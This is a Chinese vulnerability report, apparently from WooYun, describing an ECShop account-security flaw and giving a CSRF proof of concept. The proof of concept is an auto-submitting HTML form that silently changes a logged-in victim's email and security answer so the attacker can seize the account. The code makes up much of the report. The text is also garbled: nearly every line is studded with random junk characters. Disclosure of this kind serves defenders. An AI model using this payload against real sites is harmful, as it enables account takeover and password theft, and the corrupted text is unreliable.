简要描述:
: v' {% y$ d) _ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现7 X, `8 W. ~6 L2 k% l0 W, e/ b5 }* P
+ |# y7 }4 M6 ^# Q
Demo For:http://www.wooyun.org/bug.php?action=view&id=395. g' [, D+ }2 I0 @ i
) B1 ^6 q; @5 n" N( t详细说明:
; z; {% z( u- }) }* ]. S利用csrf和xss可以突破官方所说的“障碍”1 s/ z8 e9 C. d
xss版本已经有人说明% H# }2 n' W- a) O* x ?
这里给出csrf版本1 x! \# ~6 F: Y" ]7 `
' a) u( C c# T5 P$ I- s
漏洞证明:
" P+ G' B. V3 c1 e B<html>. k' {8 @" Q8 @' E# [: W
<body>
x5 \8 V. q0 z: y8 T<form action="http://www.wooyun.org/ecshop/user.php" method="POST">+ U. F! [9 r0 ^% ~
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
! d A; T; K& X$ {<INPUT TYPE="text" NAME="act" value="act_edit_profile">- I# w# \: h5 `& m* ~
<INPUT TYPE="text" NAME="sel_question" value="ecshop">% [- g$ ^& X. ]
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
" N: N; ~) C8 l0 U' |& _: |: B/ C</body>
* o- V2 w4 z; f O; T2 t<script>
+ e; ]- ~" J' a+ Edocument.forms[0].submit();
2 N) n1 k; I& a; M2 k( Y! e1 P n0 s</script># X9 B9 r6 ]- \5 [$ s I0 O3 P
</html>
. o y; K$ Y; M) K+ F' Z$ Y a构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失8 r, y. D+ J* F* l. Q
/ e" Z& Z/ o8 b" r+ o
|